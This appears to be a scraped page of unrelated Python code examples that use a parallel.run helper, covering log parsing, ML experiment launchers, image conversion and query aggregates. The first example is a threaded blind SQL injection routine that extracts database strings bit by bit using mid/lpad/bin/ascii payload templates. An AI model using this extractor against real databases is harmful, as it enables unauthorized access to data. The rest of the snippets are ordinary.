Exemplo n.º 1
0
def get_string(template, val, func):
    # val: 'version()'
    # get length
    ltemp = 'mid(lpad(bin(length(%s)), 8, "0"), %d, 1) = %s'
    length = binary_search(func, template % ltemp, val,
                           8)  # content length limit: 2^8
    print('length: %d' % length)

    wtemp = 'mid(lpad(bin(ascii(mid(%s, {0}, 1))), 8, "0"), %d, 1) = %s'
    print('\r' + '_' * length, end='')
    output = dict()

    def _(obj):
        (i, j) = obj
        _ascii = binary_search(func, template % wtemp.format(j + 1), val, 8)
        output[i] = chr(_ascii)
        print('\r' + ''.join(output.get(_i, '_') for _i in range(length)),
              end='')
        sys.stdout.flush()

    parallel.run(_,
                 enumerate(range(length)),
                 thread_num=max(1, min(THREAD_N, length // 2)))
    print()
    return ''.join(output.get(_i, '_') for _i in range(length))
Exemplo n.º 2
0
    def _update_file(self):
        if self._updating:
            return

        with self._update_lock:
            self._updating = True

        def download_and_compare():
            new_file_name = self.get_file_path() + '.new'

            try:
                ash.get_review_into_file(
                    self._review.get_id(),
                    self._name_in_review,
                    new_file_name,
                )

                self._review._diff_with_remote(
                    self.get_file_path(),
                    new_file_name,
                )
            finally:
                with self._update_lock:
                    self._updating = False

        parallel.run(download_and_compare)
Exemplo n.º 3
0
 def _download_file(self):
     parallel.run(lambda: ash.get_review_into_file(
         self._review.get_id(),
         self._name_in_review,
         self.get_file_path()
         )
     )
Exemplo n.º 4
0
def run_jobs(jobs, args, key):
    jobs = [tuple(map(str, job)) for job in jobs]
    if config.SCHEDULER == 'parallel':
        machines = parallel.parse_machines(args.machines, args.njobs)
        parallel.run('experiments.py', jobs, machines=machines, key=key)
    elif config.SCHEDULER == 'single_process':
        single_process.run('experiments.py', jobs)
    else:
        raise RuntimeError('Unknown scheduler: %s' % config.SCHEDULER)
def run_jobs(jobs, args, key):
    jobs = [tuple(map(str, job)) for job in jobs]
    if config.SCHEDULER == 'parallel':
        machines = parallel.parse_machines(args.machines, args.njobs)
        parallel.run('experiments.py', jobs, machines=machines, key=key)
    elif config.SCHEDULER == 'single_process':
        single_process.run('experiments.py', jobs)
    else:
        raise RuntimeError('Unknown scheduler: %s' % config.SCHEDULER)
Exemplo n.º 6
0
def avg(data, column):
    global __is_aggregate
    __is_aggregate = True
    vals = [row[column] for row in data]
    data = parallel.run(parallel.map(
        lambda chunk: [(sum([int(line) for line in chunk]), len(chunk))]), 
        vals,
        'avg()'
    )
    dividend = parallel.run(parallel.reduce(lambda data: sum([d[0] for d in data], 0.0)), data)
    divisor  = parallel.run(parallel.reduce(lambda data: sum([d[1] for d in data])), data)
    return sum(dividend)/sum(divisor)
Exemplo n.º 7
0
def _where(where, data):
    """
    Compile `where` ast into executable code and run 
    a parallel 'filter' on the data with it
    """
    if where is None:
        return
    ast.fix_missing_locations(where)
    return parallel.run(__where, data, "<where clause>", syntree=where)
Exemplo n.º 8
0
    def crunchlogs(self):
        global log_regex
        if self.args.format is not None:
            logformat = self.args.format
        else:
            logformat = logformat.TYPES[self.args.type]

        print
        lines = []
        for logfile in self.args.logfile:
            screen.print_mutable("Reading lines from %s:" % logfile.name)
            lines += logfile.readlines()
            screen.print_mutable("Reading lines from %s: %d" % (logfile.name, len(lines)))
            logfile.close()
            screen.print_mutable("", True)

        log_regex = re.compile(parse_format_string(logformat))
        if self.args.lines:
            lines = lines[:self.args.lines]
        st = time.time()
        self.data = parallel.run(log_match, lines, _print=True)
        et = time.time()
        print "%d lines crunched in %0.3f seconds" % (len(lines), (et-st))
Exemplo n.º 9
0
                    help="eval mode only")
parser.add_argument("--retrain",
                    default=False,
                    action="store_true",
                    help="force retrain")
args = parser.parse_args()

commands = []

# all targets
targets = ["movement", "movement_up", "anomaly", "future_anomaly", "positive"]

# iterate over all folders
for folder in os.listdir("logs/"):
    for target in targets:
        commands.append('python -O classify.py "%s" --target %s' %
                        (os.path.join("logs", folder), target))

if args.eval:
    commands = [cmd + " --nobalance" for cmd in commands]

if args.retrain:
    commands = [cmd + " --retrain" for cmd in commands]

# all the commands to run
print("Going to run following commands (%d):" % (len(commands)))
for command in commands:
    print("-", command)

parallel.run(commands, num=4)
loss = [
    "InfoNCE",
    "VAE",
    "BCE-Movement",
    "BCE-Up-Movement",
    "BCE-Anomaly",
    "BCE-Future-Anomaly",
]
bars = ["time", "volume", "dollars"]

commands = []

# we do 1000 epochs each
num_epochs = 1000

for a in bars:
    for b in loss:
        commands.append(
            "python -O train.py --validate --bar_type %s --loss %s --num_epochs %d"
            % (a, b, num_epochs)
        )

# all the commands to run
print("Going to run following commands (%d):" % (len(commands)))
for command in commands:
    print("-", command)

# run all commands
parallel.run(commands)
Exemplo n.º 11
0
def imageToRGB(width, height, full_data):
    return parallel.run(p_imageToColorLine, range(0, height), [specToRGB, width, full_data], verbose=VERBOSE_LEVEL)
Exemplo n.º 12
0
def imageToEnergy(width, height, full_data):
    return parallel.run(p_imageToGrayLine, range(0, height), [specToEnergy, width, full_data], verbose=VERBOSE_LEVEL)
Exemplo n.º 13
0
trials = [
        # (lambda x: x+2, 1),
        # (lambda x, y: x+y, 1),
        # (lambda x, y: x-y, 1),
        # (lambda x, y: x*y, 1),
        (lambda x, y: x/y, 1),
        # (lambda x, y, z: x * (y + z), 2),
        # (lambda w, x, y, z: (w + x) / (y - z), 3),
        # (lambda x, y, z: x / (y + z), 2),
        # (lambda w, x, y, z: (w + x) * (y + z), 3),
        # (lambda w, x, y, z: w + x*(2.0 + y*z), 4),
        # (lambda I, M, m, l, b: -(I+m*l*l)*b / (I*(M+m) + M*m*l*l), 10),
        # (lambda x: 6.0*x, 1)
]

# models = [
#         mlp,
#         pnet_lambda(SCALE)
# ]

models = [pnet_lambda(lamb) for lamb in (100,)]# (100, 1000, 10000)]

for fn, steps in trials:
    X, y = util.generate_data(fn, DATASIZE, scale=SCALE)#, noise=np.random.randn)
    # pnet(fn, X, y, steps)
    all_losses = parallel.run(models, args=(fn, X, y, steps))
    # for losses in all_losses:
    #     plt.plot(losses)
    # plt.legend(['Standard MLP', 'Processor network'])
    # plt.show()
Exemplo n.º 14
0
def min(data, column):
    global __is_aggregate
    __is_aggregate = True
    min = __builtins__['min']
    vals = [row[column] for row in data]
    return min(parallel.run(parallel.reduce(lambda chunk: min([int(i) for i in chunk])), vals))
Exemplo n.º 15
0
import basic
import basic2
import nested
import inheritance
import complex_types
import libuse
import parallel

from autolog import Autolog

autolog = Autolog(
    [basic, basic2, nested, inheritance, complex_types, libuse, parallel])
autolog.run()  # by running this function, logging is activated

complex_types.run()
libuse.run()
basic.run()
basic2.run()
nested.run()
inheritance.run()
parallel.run()